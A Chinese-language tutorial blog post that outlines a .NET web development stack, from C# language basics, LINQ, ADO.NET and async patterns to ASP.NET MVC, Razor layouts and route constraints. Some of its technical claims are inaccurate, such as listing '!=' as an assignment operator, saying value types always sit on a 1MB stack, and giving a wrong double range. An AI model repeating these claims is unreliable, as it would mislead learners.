# [.Net Web开发技术栈](http://www.cnblogs.com/1996V/p/7700087.html)

有很多朋友有的因为兴趣，有的因为生计而走向了.Net中，有很多朋友想学，但是又不知道怎么学，学什么，怎么系统的学，为此我以我微薄之力总结归纳写了一篇.Net web开发技术栈，以此帮助那些想学，却不知从何起的朋友。

本文整理了当前企业web开发中的管理系统，商城等系统的常用开发技术栈。

## ****C#常见运算符****

* 一元运算符（+、-、!、~、++、--）
* 算术运算符（\*、/、%、+ 、 – ）
* 移位运算符（<< 、>> ）
* 关系和类型测试运算符（==、!=、<、>、<=、>=、is 和 as）
* 逻辑运算符（&、^ 和 | ）
* 条件逻辑运算符（&& 和 || ）
* 空合并运算符（??）条件运算符（它也称为三元运算符，?: ）
* 赋值运算符（=、+=、-=、!=、/=、&=、|=）
* **什么是表达式？**
* 表达式是由运算符和运算对象组成，单独的一个运算对象（常量/变量）也可以叫做表达式，这是最简答的表达式。
* eg：4,4+2，c = 7+5,3>5，……

## ****C#常见语句块****

* Try（用于捕捉在块的执行期间发生的各种异常）
* Checked 语句和 Unchecked（用于控制整型算术运算和转换的溢出检查上下文）
* Lock（获取某个给定对象的互斥锁，执行一个语句，然后释放该锁）
* Using(获取一个或多个资源，执行一个语句，然后释放该资源)

## ****变量与常量****

C#变量可以分为**值类型**和**引用类型**，值类型又可以分为**简单类型**和**复杂类型**。

值类型 => 简单类型

=>整数类型/基元类型(byte,short,int,long)

=>浮点类型(float,double)

=>布尔类型(bool)

=> 复杂类型(Enum,struct)

引用类型 => Array,String,Class,delegate

计算机的存储单位由小到大：bit => byte => kb => mb => gb => tb

|  |  |  |  |  |
| --- | --- | --- | --- | --- |
| **类型** | **说明** |  |  | **范围** |
| Byte | 8位 | 8bit | 1b空间 | 0~255 |
| Short | 16位 | 16bit | 2b空间 | -32768~32767 |
| Int | 32位 | 32bit | 4b空间 | -21亿~21亿 |
| Float | 精确到7位数 |  |  | 1.5X10-45~3.4X1038 |
| Double | 精确到15~16位数 |  |  | 50X10-324~1.7X10308 |

**枚举**：定义了一组常量键值对，直接可以取出int类型的值，如需取出键需调用Enum.GetName()方法。

**结构体**：与类相似，用struct定义；存放在栈中默认占用1MB空间；

**值类型与引用类型的区别**：值类型是存放在栈上，默认大小1MB，引用类型只受机器内存的限制。所以值类型的效率比引用类型的高。

**设计思想的区别**：对于动态大小的东西一般放在引用类型中，对于固定大小的东西放在值类型中。

## ****C#类型转换****

类型转换可以分为**隐式类型转换**和**强制类型转换**。

**值类型**中将小范围的转化为大范围的是**隐式转换**，例如：byte转int，因为byte占用1b空间，int占用4b空间。

值类型中将大范围转换为小类型的是**强制转换**，例如：int转byte，编译器会提示编译错误，需要加上括号或者调用Convert类的方法。

如果使用括号，有可能会出现错误的结果，这将让错误的结果在程序中运行。而如果使用Convert类的方法，后台会抛出异常，推荐使用。

**引用类型**中将子类型转换为父类型的是**隐式转换**，将父类型转换为子类型是**强制转换**。

## ****C#书写规范和命名规范****

**书写规范**

1.  尽量使用接口，然后使用类实现接口，以提高程序的灵活性。

2. 一行不要超过80个字符

4. 关键的语句写注释

5. 建议局部变量在最接近使用它的地方声明

6. 不要使用goto系列语句，除非使用在跳出深层循环时

7. 避免出现使用超过5个参数的方法。可以用类来代替

8. 避免书写代码量过大的try....catch模块

9. 避免同一个文件中放置多个类，尽量一个文件对应一个类型

10. 生成和构建一个长的字符串时，一定要使用StringBuilder类型，而不用string类型

11. switch语句一定要有default语句来处理意外情况

12. 对于if语句，使用“{}”把语句块包含起来

13. 尽量不使用this关键字引用

**命名规范**

1. 用Pascal规则来命名方法和类型，pascal命名规则是第一个字母必须大写，并且后面的连接词第一个字母也要大写。
2. 所有的成员变量前加前缀“\_”
3. 接口名称加前缀“I”
4. 所有成员变量声明在类的顶端，用换行把他和其他方法分开
5. 使用某个控件的值时，尽量命名局部变量

## ****C#常见类修饰符****

* abstract抽象类

C#允许把类和方法声明为abstract。抽象类不能实例化，而抽象方法不能直接实现，必须在非抽象类的派生类中重写

* sealed密封类

给类添加sealed修饰符，就不允许创建该类的子类。密封一个方法，表示不能重写该方法

* virtual虚方法

把一个基类方法声明为virtual，就可以在任何类的派生类中重写该方法。也可以将属性声明为virtual

* static静态类

静态类无法被实例化，仅包含静态成员。Static修饰的成员，是属于类的，当这个类第一次加载时，该类下的所有静态成员会被加载，静态成员是唯一的，直到程序退出才会被回收。

* 静态成员(属性，字段，方法等)

静态成员属于类所有，它在内存中只占用一块区域，无论类创建了多少实例。而使用实例化会创建多个内存;静态方法效率上比实例高，缺点是不自动进行销毁，而实例化则可以做销毁

* Override 重写方法

C#要求在派生类的函数重写一个函数时，要使用override关键字显示声明

* partial分部修饰

访问修饰符（public、protected、internal 和 private ）

|  |  |  |
| --- | --- | --- |
| 修饰符 | 应用于 | 说明 |
| Public | 类和类的成员 | 任何代码均可访问 |
| Protected | 类的成员 | 只有派生的类型能访问 |
| Internal | 类和类的成员 | 只有包含在它的程序集中才能访问能访问 |
| Protected inernal | 类的成员 | 可以在其他项目中被子类使用 |
| Private | 类的成员 | 只有在类的内部才能访问 |

## ****C#常用预处理指令****

* #region：指定一个可展开或折叠的代码块
* #endregion：它标识着 #region 块的结束
* #define： 它用于定义一系列成为符号的字符
* #undef：它用于取消定义符号
* #if、#else、#elif、#endif：用于创建复合条件指令
* #waring常用于#if语句中，用来提醒调试代码是否启动

## ****委托****

* Delegate、Lambda、Action、Func、Predicate、事件EventArgs
* 要把方法传递给一个方法时就需要用到委托。该方法可以是普通方法，也可以是静态方法。
* 多播委托：委托也可以包含多个方法，如果使用多播委托就可以按循序调用多个方法，为此多播委托的返回值必须为空
* Lambda表达式，从C# 3.0开始，就有一种的新的方法实现委托的赋予：Lambda表达式。只有委托参数类型的地方，就可以使用Lambda表达式。
* 泛型Action<T>委托表示引用一个void返回类型的方法。这个委托至多可以传递16种不同的参数类型。Action<in T>调用带一个参数的方法。
* Func<T>顾名思义它的使用方式类似于方法，所以它允许带返回值。它也可以至多传递16个参数类型。Func<out TResult>可以调用带返回值且无参数的方法
* 事件基于委托，为委托提供了一种发布/订阅机制

## ****泛型****

* 泛型类、泛型方法、泛型约束、泛型接口、协变和抗变
* 泛型的一个主要优点是性能，避免了拆箱和装箱操作
* 泛型的另一个优点是类型安全，在泛型类List<T>中，泛型类型T定义了允许使用的类型。
* 泛型类型的命名规范：
* 泛型类型的名称用字母T作为前缀
* 如果没有特定要求泛型类型允许用任意类替代
* 如果泛型类型有特定的要求，或者使用了两个以上泛型类型，就应该给泛型类型使用描述性的名称，如：TEventArg，TValue，TKey，TInput
* 创建一个泛型类有4点需要注意的：
* 1.默认值，由于泛型类型可能是值类型(默认值0)或引用类型(默认值null)，为了解决该问题，可以使用default关键字，通过default关键字，将null赋予引用类型，0赋予值类型。
* 2.约束，如果泛型类需要调用泛型类型中的方法，就必须添加约束，将T改为Txxx，并在where子句中指定实现的接口。如：public class DocumentManager<TDocument> where TDocument : IDocument {
* 3.继承，泛型类型可是现实泛型接口，也可以派生自一个类，泛型类也可以继承泛型基类，其要求是必须重复接口的泛型类型，或者必须指定基类的类型。
* 4.静态成员，如：public class StaticDemo<T>{ public static int x}，由于同时对一个string类型和一个int类型使用了StaticDemo<T>类，因此存在两组静态字段。
* 使用泛型类型可以定义接口，在接口的定义中可以使用带泛型的参数
* 协变和抗变：在.NET 4之前，泛型接口是不变的。.NET 4通过协变和抗变为泛型接口和泛型委托添加了一个重要拓展。协变和抗变指对参数和返回值的类型进行转换。
* 协变：协变类型用out参数标注，支持隐式转换，可以将方法的返回值设置为T，不能把T作为输入参数
* 抗变：抗变类型用in参数标注，泛型接口就是抗变的，支持强制转换，可以将T作为输入参数，不能将T设置为返回值。
* 泛型方法：除了定义泛型类之外，还可以定义泛型方法，在方法声明中可以定义泛型类。泛型方法可以在非泛型类中定义。

## ****Linq****

概念：语言集成查询(Language Integrated Query,Linq)在C#中集成了查询语法，可以用相同的语法访问不同的数据源。Linq提供了不同数据源的抽象层，所以可以使用相同的语法。

并不是所有的查询都可以用Linq查询语法完成。也不是所有的拓展方法都映射到Linq查询子句上。高级查询需要使用拓展方法。

Linq有两种语法风格：

1. “查询语法(Query Syntax)”，这种语法格式类似于SQL查询。
2. “点语法(Dot-nontation Syntax)”，这种语法是基于拓展方法的。

“查询语法”的格式：查询表达式必须以from开头，以select或group结束。在这两个子句中间可以使用where，orderby，join，let和其他from子句。

Linq有的方法有延迟的特性，这个特性的效果是直到对结果进行遍历，才会执行该查询。

|  |  |  |
| --- | --- | --- |
| 拓展方法 | 描述 | 延迟 |
| All | 如果数据源的所有条目都与谓词匹配，则返回true | 否 |
| Any | 如果数据源至少有一个条目与谓词匹配，则返回true | 否 |
| Contains | 如果数据源包含指定的条目或值，返回true | 否 |
| Count | 返回数据源的条目数 | 否 |
| First | 返回数据源的第一个条目 | 否 |
| FirstOrDefault | 返回数据源的第一个条目，或无条目时，返回默认值 | 否 |
| Last | 返回数据源最后一个条目 | 否 |
| LastOrDefault | 返回数据源最后一个条目，或无条目时，返回默认值 | 否 |
| Max或Min | 返回由Lamdba表达式表示的最大值或最小值 | 否 |
| OrderBy  OrderByDesceding | 基于Lambda表示式返回值对数据源进行排序 | 是 |
| Reverse | 反转数据源中数据项的顺序 | 是 |
| Select | 设计一个查询结果 | 是 |
| SelectMany | 把每个数据项投射到一个条目序列中，然后把所有的这些结果序列连接成一个序列 | 是 |
| Single | 返回数据源第一个条目，或者有多个匹配时抛出异常 | 否 |
| SingleOrDefault | 返回数据源第一个条目，或无条目时，返回默认值；有多个条目匹配时，抛出一个异常 | 否 |
| Skip  SkipWhile | 跳过指定数目的元素，或者当谓词匹配时跳过 | 是 |
| Sum | 对谓词选定的词求和 | 否 |
| Take  TakeWhile | 从数据源的开始处选择指定数目的元素，或当谓词匹配时选择条目 | 是 |
| ToArray  ToDictionary  ToList | 把数据源转成数组，字典，列表 | 否 |
| Where | 过滤数据源中与谓词不匹配的条目 | 是 |

* 内连接用join子句合并两个数据源
* 左外连接用join子句和DefaultIfEmpty方法定义
* 常用方法介绍：
* Where()方法:
* Where<TSource>(this IEnumerable<TSource> source, Func<TSource, int, bool> predicate);
* 该方法的委托参数第一个参数TSource表示数据源(即调用它的对象)，第二个参数是索引序列，返回值为bool
* Where<TSource>(this IEnumerable<TSource> source, Func<TSource, bool> predicate);
* 该方法的委托参数第一个参数TSource表示数据源，返回值为bool
* SelectMany()方法:
* SelectMany<TSource,TResult>(this IEnumerable<TSource> source, Func<TSource, IEnumerable<TResult>> selector);
* 该方法的委托参数第一个参数TSource表示数据源，返回值为合并后的集合
* SelectMany<TSource, TCollection, TResult>(this IEnumerable<TSource> source, Func<TSource, IEnumerable<TCollection>> collectionSelector, Func<TSource, TCollection, TResult> resultSelector);
* 该方法的第一个委托参数第一个参数TSource表示数据源，返回值为合并后的集合，第二个委托参数第一个参数TSource表示相同的数据源，第二个参数表示第一个委托参数的返回值(集合)，第三个参数表示合并后的集合
* OrderBy() OrderByDescending() ThenBy() ThenByDesceding() 方法。
* OrderBy<TSource, TKey>(this IEnumerable<TSource> source, Func<TSource, TKey> keySelector);
* 上面四个方法的第一个委托参数TSource表示数据源，返回值为排序的关键字名称TKey
* GroupBy() 方法
* GroupBy<TSource, TKey>(this IEnumerable<TSource> source, Func<TSource, TKey> keySelector);
* 第一个委托参数TSource表示数据源，返回值表示分组的关键字名称。它的返回值是IGrouping对象，它定义了Key属性用于访问分组的关键字，还有分组后的TSource对象也可以访问的到.

## ****反射****

* 反射拼接SQL语句、反射转换Json/Datatable...、序列化反序列化（ISerializable）、反射动态调用dll、反射动态配置扩展
* 序列化是把一个对象持久化到磁盘中的过程。另一个应用程序可以反序列化对象，使它的状态与序列化之前一样。
* **XML数据格式**
* 我们可以使用XMLDocument类在文档对象模型(DOM)层次结构内导航
* 也可以使用XMLReader和XMLWriter。使用XML更复杂，但可以读取更大的文件。使用XMLDocument把文档全部加载进了内存中，使用XMLReader可以逐个节点读取。
* 另一个使用XML的方式是System.Xml.Serialization，把.NET对象序列化为XML，也可以把XML反序列化为.NET对象。
* 查询XML内容时，可以使用XML标准XPath或Linq to Xml。
* 对于WCF，XML可以压缩为二进制格式。JSON也可以压缩为二进制格式(BSON) .
* 我们可以使用WSDL描述XML数据，使用Swagger描述JSON数据。
* **XmlReader，XMLDocument和XPathNavigator类**
* XmlReader和XmlWriter类提供了读写大型XML文档的快速方式。
* 常见的遍历文档的方法有Read()方法进入下一个节点。然后验证该节点是否有值(HasValue())，或者该节点是否有特性(HasAttributes())，XmlReader还可以读取强类型的数据，它有几个方法如：ReadElementContentAsDouble()，ReadElementContentAsString()
* XmlDocument类用于在.NET中读写DOM类。与XmlReader和XmlWriter不同的是XmlDocument具有读写的功能，并可以随机访问DOM树。常见的遍历方法有GetElementByTagName()获取指定元素的列表，然后调用子集的OuterXml,InnerXml,NextSibling,PreviousSibling等属性。
* XPathNavigator也可以读写XML文档，特点是可以通过XPath语句访问到指定元素。要注意的是，只用通过XMLDocument创建的对象才可以修改文件，通过XMLPathDocument创建的对象是只读的。。
* **XML序列化**
* .NET Framework为序列化提供了两个名称空间：System.Xml.Serialization和System.Xml.XmlSerializer。它包含的类可用于把对象序列化为Xml文档或者流。这也就表示把对象的公共属性和字段转换为Xml元素或属性。
* 我们可以在POCO的属性上添加XmlElement元素，来定义输出XML的名称，命名空间，类型等。如：ElementName设置XML元素的名称，Namespace设置命名空间的名称，Order设置顺序
* XmlAttribute可以将POCO的属性设置为XML的属性，并且可以设置XML属性的名称，命名空间等。

## ****常用类****

* IO类、Json.NET、Http辅助类（HttpClient、Restsharp、WebClient、WebRequest）、爬虫类、文件压缩类、条形码 、金额、时间、Assembly等类的实现
* **IO类**
* File，FileInfo类可以读取，写入，创建，删除，移动文件
* 在C# 4.0之前ReadAllLines()方法用于读取文件中所有的行，并以数组的形式返回，但是它有一个问题，就是它要等所有的行写入内存之后才能读取第一行内容。
* ReadLines()方法解决了这个问题，它返回IEnumerable<string>而不是string数组，这个新增的方法要高效很多，它不是将所有行一次性加载进内存中，而是每次读取一行。
* 如果要打开一个很大的文件，之前的方法要等整个文件都加入内存中，才能访问第一行。而这个新方法每次只读取一行，更加高效。
* Path类可以读取文件或目录的信息如：扩展名，文件，文件夹名，返回随机文件，创建临时文件等。
* 流是一个用于传输数据的对象，数据可以向两个方向传输：
* 外部源 --> 程序 (读取流)
* 程序 --> 外部源 (写入流)
* 外部源可能是一些网络协议(接口)，命名管道，内存区域
* 我们可以使用System.IO,MemoryStream对象读写内存
* System.Net.Sockets.NetworkStream对象处理网络数据
* Stream类对外部数据源不做任何假定，外部数据源可以是文件流，内存流，网络流或任意数据源。
* 一些流可以链接调用(chain)，可以先使用DeflateStream压缩数据，然后写入到FileStream,MemoryStream或NetworkStream中。
* 直接读写流不是那么容易，但是可以使用阅读器和写入器，流入StringReader和StringWriter类。这是一个关注点分离。
* 使用FileStream类读写文本文件，需要使用字节数组。有更简单的方法：使用读取器(StreamReader)和写入器(StreamWriter)，使用它们无需处理字节数组和编码，比较轻松。

## ****数据层****

* 原生的ADO.NET
  + Connections. 用于连接和管理针对数据库的事务。
  + 为了访问数据库，需要提供某些连接参数，如运行数据库的计算机和登记证书。使用SqlConnection类来连接SQLServer
  + 我们可以在https://www.connectionstrings.com/上找到各个数据库的连接字符串。
  + 连接池，现在关闭连接不会关闭与服务器的连接。相反，连接会添加到连接池中。再次打开连接，它可以从连接池中提取，因此打开连接会非常快速，只有第一次打开连接需要一定的时间。
  + Commands. 用于发出针对数据库的SQL指令。
  + 创建命令：conn.CreateCommand()
  + 赋予SQL语句：command.CommandText = sql
  + 设置参数：command.Parameter.AddWithValue(“ID”,1)
  + 执行命令：ExecuteNonQuery() ---执行命令，但不返回结果
  + ExecuteReader() ---执行命令，返回一个IDataReader
  + ExecuteScalar() ---执行命令，返回结果集中第一行第一列的数据
  + DataReaders. 用于从SQL Server数据源读取只进流的数据记录。
  + 读取数据时，Read方法在while循环中调用。
  + 访问列的时候，调用不同的GetXXX方法
  + DataSets. 用于针对结构型数据，XML数据和关系型数据的存储，远程处理和编程。
  + DataSet 由一组数据表组成
  + 
  + DataAdapters. 用于推送数据到DataSet，并针对数据库协调数据。
  + 赋予SQL语句：new SqlDataAdapter(sql,conn)
  + 填充数据集：adapter.Fill(ds)
  + 存储过程
  + 设置调用的是存储过程，而非SQL语句：command.CommandType = CommandType.StoredProcedure;
  + 将参数传出去：adapter.SelectCommand = command;
* ORM框架
  + EF
  + [Dapper：最常见的轻量级ORM框架（开源）](https://github.com/StackExchange/Dapper)
  + Nhibernate：最常见的重量级ORM框架
  + ...

## ****异步和多线程****

* Thread/ThreadPool/Task/Await/Async/Parallel...
  + 多线程
    - 多线程中的同步、并发、异常等处理
    - ...
  + TPL异步
    - 使用异步编程，方法调用时在后台运行，并且不会阻塞调用线程。
    - **异步编程模型Async Patterns Model(APM)**
    - 异步模式定义了BeginXXX和EndXXX方法。BeginXXX方法接受其同步方法的所有输入参数，EndXXX方法使用同步方法的所有输出参数，并按照同步方法的返回类型来返回结果。
    - **基于事件的异步模式Event-based Async Pattern(EAP)**
    - 基于事件的异步模式定义了一个带有“Async”后缀的方法。例如，对于同步方法DownloadString，WebClient提供了异步方法DownloadStringAsync。并且你需要编写DownloadStringCompleted事件，这个事件会在异步方法完成后调用。
    - 基于事件的异步方法优势在于易于使用。但是，在自定义类中这个模式就没有这么简单了。
    - **基于任务的异步模式Task-based Async Pattern(TAP)**
    - 该模式定义一个带有“Async”后缀的方法，并返回一个Task类型。例如WebClient提供的基于任务的异步方法DownloadStringTaskAsync，该方法返回一个Task<string>，可以用string类接收它，并使用await关键字，await关键字会解除线程(UI线程)的阻塞，完成其他任务。
    - async和await关键字只是编译器的功能。编译器会用Task类创建代码。如果不使用者两个关键字，也可以用C# 4.0和Task类的方法来实现同样的功能，只是没有那么方便。
    - async修饰符只能用于返回.NET类型的Task或void方法，以及Window运行库的IAsyncOperation。
    - Task类的ContinueWith方法定义了任务完成后就调用的代码。指派给ContinueWith方法的委托接收已完成的任务作为参数传入，使用Result属性可以访问任务返回的结果。
    - Task类定义了WhenAll和WhenAny组合器。从WhenAll方法返回的Task，是在所有传入方法的任务都完成了才会返回Task。从WhenAny方法返回的Task，是在其中一个传入方法完成了就会返回Task。

## ****数据结构****

* 算法
* 百鸡算法，贪婪思想，递归
* 线性表
* 二叉树
* 栈与队列
* **算法 (真正的编程应该是：编程=XX语言+数据结构+算法)**
* **递推思想**
* 概念：通过已知条件，利用特定关系逐步递推，最终得到结果为止，核心就是不断的利用现有信息推导出新的东西。
* 分类：“顺推”，“逆推”
* “顺推”是指通过条件推出结果
* “逆推”是指通过结果推出条件
* 例子：“斐波那契”数列，银行取钱
* **递归思想**
* 概念：递归，说白了就是直接或者间接的调用自己的一种算法。它是把求解问题转化为规模较小的子问题，然后通过多次递归一直到可以得出结果的最小解，然后通过最小解逐层向上返回调用，最终得到整个问题的解。总之递归可以概括为一句话就是：“能进则进，不进则退”。
* 三要素：
* 递归中每次循环都必须使问题规模有所缩小。
* 递归操作的每两步都是有紧密的联系，如在“递归”的“归操作时”，前一次的输出就是后一次的输入。
* 当子问题的规模足够小时，必须能够直接求出该规模问题的解，其实也就是必须要有结束递归的条件。
* 注意事项：
* 深层次的递归会涉及到频繁进栈出栈和分配内存空间，所以运行效率比较低，当问题规模较大时，不推荐使用。
* 在递归过程中，每次调用中的参数，方法返回点，局部变量都是存放在堆栈中的，如果当问题规模非常大时，容易造成堆栈溢出。
* 例子：阶乘，十进制转二进制
* **贪心思想**
* 贪心算法（又称贪婪算法）是指，在对[问题求解](https://baike.baidu.com/item/%E9%97%AE%E9%A2%98%E6%B1%82%E8%A7%A3)时，总是做出在当前看来是最好的选择。也就是说，不从整体最优上加以考虑，他所做出的是在某种意义上的局部[最优解](https://baike.baidu.com/item/%E6%9C%80%E4%BC%98%E8%A7%A3)。
* 注意事项：
* 不能保证贪心所得出的解是整体最优的。
* 不能用来求最大解和最小解问题。
* 只能求满足某些约束条件的可行解的范围。
* 例子：背包问题，找零钱
* **枚举思想**
* 将问题的所有可能的答案一一列举，然后根据条件判断此答案是否合适，保留合适的，舍弃不合适的。
* 枚举是我们在无奈之后的最后一击，那么使用枚举时我们应该尽量遵守下面的两个条件：
* 1.地球人都不能给我找出此问题的潜在规律。
* 2.候选答案的集合是一个计算机必须能够承受的。

## ****ASP.NET MVC框架****

ASP.NET MVC，前者代码支撑该应用框架的技术平台，它表明ASP.NET MVC和传统的Web Forms应用框架一样，都是建立在ASP.NET平台上的；后者表示该框架背后的设计思想，意味着ASP.NET MVC采用了MVC的架构模式。

一个典型的人机交互应用具有三个主要的关注点：数据的呈现，UI处理逻辑和业务逻辑。

自治视图将三种柔和在了一起，势必会带来以下三个问题：

1. 可测试性
2. 稳定性
3. 重用性

解决问题的办法是采用“关注点分离”，将数据的呈现，UI处理逻辑和业务逻辑三者分离出来。这里采用的模式就是MVC。

**页面动态输出**

Web页面从服务器到浏览器的整个呈现过程实际上是分三步：第一步是通过视图引擎对视图文件进行解释，将视图文件中的代码转成HTML代码，这一步叫**渲染**；第二步是将渲染后的HTML标记传递给客户端浏览器，这一步是页面的**传递**；第三步是浏览器接收到HTML后对其进行处理并呈现为Web页面，这一步才叫**呈现**。由此可见，渲染是把页面的非HTML代码转成HTML标记，这一步是由服务器完成的。而呈现是把HTML标记显示成Web页面，这一步工作是由浏览器完成的。渲染和呈现是整个页面处理过程两个不同的阶段，更不能把这两步工作混谈只有“呈现”。

**ASP.NET管道**

1. **HttpApplication**

HTTPApplication是整个ASP.NET的核心，它负责处理分发给它的HTTP请求。由于一个HTTPApplication对象在某一个时刻只能处理一个请求，只有完成对某个请求的处理后才能用于后续请求的处理，所以ASP.NET采用对象池的方式来创建或获取HTTPApplication对象。

1. **HttpModule**

ASP.NET拥有一个具有高度可拓展性的引擎，并且能够处理对于不同资源类型的请求。那么是什么成就了ASP.NET的拓展性呢？HttpModule功不可没。

以下一些就是典型的HTTPModule基础功能：

OutputCacheModule：实现了输出缓存功能

SessionStateModule：在无状态的HTTP协议上实现了基于会话（Session）的状态保存。

WindowsAuthentication + FormsAuthentication + PassportAuthentication Module：实现了Windows，Forms和Passport这三种典型的身份认证方式。

1. **HttpHandler**

对于不同资源的请求，ASP.NET会加载不同的Handler来处理，比如aspx页面（实现了IHttpHandler接口）和asmx Web服务（WebServiceHandler）对应的Handler是不同的。所有的HttpHandler都实现了具有如下定义的接口System.Web.IHttpHandler，定义了其中的方法ProcessRequest提供了处理请求的实现。

**Routing路由**

对于传统的ASP.NET WebForms应用来说，用户请求总是指向某个具体的物理文件，目标文件的路径决定了访问请求的URL。但是对于ASP.NET MVC应用来说，来自浏览器的请求总是来自某个Controller中的某个Action，请求URL与目标Controller/Action之间的映射是通过“路由”来实现的。

**理解MVC模式**

MVC模式意味着一个MVC应用至少将被分离成3个层次：

1. **模型**(Model)：含有或表现用户进行操作的数据。模型可以是简单的**视图模型**(View Model)，它们只用来传递控制器和视图之间的数据；也可以是**域模型**(Domain Model)，它包含业务领域的数据，以及处理这些数据的操作，转换和规则。
2. **视图**(View)：用于将模型的某些部分渲染成用户界面。
3. **控制器**(Controller)：处理传入的请求，执行模型上的操作，并选择渲染给用户的视图。

**域模型**往往是一组C#类型(类或结构等)，统称为域类型。域中的操作由域类型中定义的方法来实现，而域规则表示成这些方法的逻辑。域模型通常是持久化的，且一直处于活动状态。

域模型是应用程序中业务数据及其处理的唯一和权威定义，我们常常把与模型放在一个单独的程序集中，这样应用程序的其他部分也可以创建对与模型的引用。

在MVC中，控制器是C#类，通常派生于System.Web.Mvc.Controller类。从这个Controller派生而来的类中，每一个public方法都统称为**动作方法**(Action Method)。这个方法通过ASP.NET的路由系统与一个可配置的URL相关联。当一个请求被发送给与一个动作方法相关联的URL时，便会执行控制器类中的语句，以进行域模型上的一些操作，然后选择一个视图显示给客户端。

****

ASP.NET MVC框架使用的**视图引擎，该引擎负责处理视图的组件，以便为浏览器生成响应。**

MVC早期使用的是ASP.NET视图引擎，它用改进的WebForm标记来处理ASPX页面，MVC 3引入了Razor视图引擎。

**Razor引擎**

视图引擎(View Engine)负责处理ASP.NET的内容，并查找有关指令，这些指令典型的是将动态内容插入到发送给浏览器的输出，而Razor是MVC框架视图引擎的名称。以下是各个Razor语法的起到的作用。

|  |  |
| --- | --- |
| 问题 | 解决方案 |
| 定义并访问模型对象 | 使用@model及@Model表达式 |
| 减少视图中的重复 | 使用布局 |
| 使用默认布局 | 使用启动视图 |
| 通过控制器将数据传给视图 | 传递视图模型对象或视图包 |
| 根据数值不同输出不同结果 | 使用Razor条件语句 |
| 枚举数组或集合 | 使用@foreach表达式 |
| 在视图中添加命名控件 | 使用@using表达式 |

**使用模型对象**

在视图的第一行声明：

@model 命名空间

这样我们就能在后面通过@Model调用对象的属性，字段，方法了例如：

@Model.Name //调用Name字段

**使用布局**

我们可以在View中新建一个MVC5 Layout Page(Razor)布局视图



生成的页面如下所示：

<!DOCTYPE html>

<html>

<head>

<meta name="viewport" content="width=device-width" />

<link href="~/Content/Views/common.css" rel="stylesheet" />

<title>@ViewBag.Title</title>

</head>

<body>

<h1>

Product Information

</h1>

<div>

@RenderBody()

</div>

<h2>

View ASP.NET MVC

</h2>

</body>

</html>

其中@RenderBody()会调用动作方法所指定的视图内容，并插入到具体视图中。

接着我们在在具体视图中，指定Layout属性为这个布局视图的路径：

Layout = "~/Views/\_BasicLayout.cshtml";

但这里还有一个问题，就是必须要为每一个视图指定布局文件。这意味着如果修改了布局视图的名称，就必须修改所有引用了该布局的视图。这是易错的过程，不符合MVC易于维护的主题。

我们可以通过使用**视图起始文件**，来解决该问题。在渲染一个视图时，MVC框架会查找一个叫做**\_ViewStart.cshtml**的文件，该文件**默认加载到视图中**，除非指定视图的Layout为Null。

**MVC项目综述**

**项目结构约定**

|  |  |  |
| --- | --- | --- |
| 文件夹及文件 | 描述 | 注 |
| /App\_Data | 此文件用于放置私有数据，如XML文件，或使用SQL Server Express，SQLite的数据库文件，或其他文件的存储库 | IIS不将此文件夹的内容进行服务(意即无法通过Web来请求该目录文件) |
| /App\_start | 此文件夹包含项目的一些核心配置，包括路由和过滤器的定义，以及一些内容包 |  |
| /Areas | 区域是把一个大型应用程序划分为较小片段的方法 |  |
| /bin | 为MVC应用程序编译好的程序集放在这里，连同任何被引用的包括不在GAC中的引用程序集 | IIS不将此从文件夹的内容进行服务 |
| /Content | 用于放置静态内容，如CSS和图片等 | 这是一个约定但不是必须的，你可以把静态内容放在任何适合自己的地方 |
| /Controllers | 用于放置控制器类 | 这是一个约定，可以把控制器放在任何地方，因为它们都会被编译到同一个程序集中。 |
| /Models | 用于放置视图模型和域模型类，除非是最简单的应用程序，否则都能够获益于一个专用的定义域模型的程序集 | 这是一个约定，可以把模型放在任何地方。或是一个单独的程序集。 |
| /Scripts | 本目录意在保存应用程序的JavaScript库 | 这是一个约定，你可以把脚本放在任何位置，因为它们实际上是另一种类型的静态内容。 |
| /Views | 保存视图和分部视图，通常按它们的控制器命名的文件夹进行分组 | /Views/Web.config文件阻止IIS对这些目录的直接访问。视图必须通过动作方法来访问。 |
| /Views/Shared | 本目录保存布局，以及不专用于个别控制器的视图 |  |
| /Views/Web.config | 这不是应用程序的配置文件。它包含使视图能够与ASP.NET进行工作，防止IIS调用视图所需要的配置，还含有默认导入视图的命名空间 |  |
| /Global.asax | 这是全局ASP.NET应用程序类。它的后台代码类用于注册路由配置，也是建立涉及应用程序初始化，停机及出现未处理异常情况需要运行代码的地方 | Global.asax文件在MVC应用程序中的作用与其在WebForm应用程序中作用相同 |
| /Web.config | 这是应用程序配置文件 | 与WebForm作用相同 |

**约定优于配置**

**约定优于配置**的含义为：你不需要明确地配置控制器与其视图之间的关联，只要遵循某种命名约定，一切都会正常工作。

1. **遵循控制器约定**

控制器类名必须以“Controller”结尾，如HomeController

1. **遵循视图约定**

视图及分部视图放在/Views/ControllerName文件夹中。例如，一个与ProductController相关联的视图应该放在/Views/Product文件夹中。

MVC框架期望，一个动作方法的默认视图应当按照这个方法进行命名。例如：名为List动作方法相关联的视图应该是 “List.cshtml”。

1. **遵循布局约定**

对于布局的约定是，以下划线(\_)字符作为文件名前缀，而且布局文件应该放在/Views/Shared文件夹中。默认情况下，会通过/Views/\_ViewStart.cshtml文件将这个布局应用与所有的视图。如果不想把默认布局用于视图，可以修改\_ViewStart.cshtml中的设置，或者将Layout设置为null

**URL路由**

**路由约束**

1. 用正则表达式约束路由

controller = "^H.\*"

上述正则表达式形成了一个约束，它只匹配控制器以“H”打头的URL

action = "^Index$|^About$"

上述正则表达式形成了一个约束，它只匹配行为方法名称为“Index”或“About”的URL

1. 约束类型和值

id = new RangeRouteConstraint(10,20)

上述限制了id的值在10-20之间，还有更多的约束类，如下所示：

|  |  |  |
| --- | --- | --- |
| 名称 | 描述 | 属性约束 |
| AlphaRouteConstraint() | 匹配字母字符，主要是(A-Z,a-z) | Alpha |
| BoolRouteConstraint() | 匹配一个可以解析成bool类型的值 | Bool |
| DateTimeRouteConstraint() | 匹配一个可以解析成DateTime类型的值 | DateTime |
| DecimalRouteConstraint() | 匹配一个可以解析成Decimal类型的值 | Decimal |
| DoubleRouteConstraint() | 匹配一个可以解析成Double类型的值 | Double |
| FloatRouteConstraint() | 匹配一个可以解析成Float类型的值 | Float |
| IntRouteConstraint() | 匹配一个可以解析成Int类型的值 | Int |
| LengthRouteConstraint(len)  LengthRouteConstraint(min,max) | 匹配一个指定字符个数的值，或匹配字符个数在min和max之间的值 | Length(len)  Length(min,max) |
| LongRouteConstraint() | 匹配一个可以解析成Long类型的值 | Long |
